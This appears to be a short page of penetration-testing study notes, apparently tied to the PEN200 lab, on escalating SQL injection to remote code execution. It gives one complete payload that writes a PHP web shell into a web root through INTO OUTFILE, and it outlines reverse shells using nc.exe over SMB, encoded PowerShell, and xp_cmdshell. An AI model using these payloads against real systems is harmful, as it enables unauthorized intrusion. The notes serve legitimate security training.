CtrlK

SQLi to RCE

SQLi to RCE

Escalate SQLi to RCE by injecting malicious code into a file that can be executed via web or other means -
http://10.11.0.22/debug.php?id=1 union all select 1,2, "<?php echo shell_exec($_GET['cmd']); ?>" into OUTFILE 'C:/xampp/htdocs/backdoor.php'

Blind SQLi to RCE

Host SMB share to fetch & execute "nc.exe" and get a proper reverse shell.
Use Powershell base64 encoded payload to get a reverse shell. (Worked in PEN200 lab)

SQL Svc account to RCE

Using mssqlclient.py we can login into a machine if we have valid creds like this ->
Now, just enable_xp_cmdshell and execute commands!!

PreviousAD Exploitation NextMimikatz - Things we can do!!

Last updated 2 years ago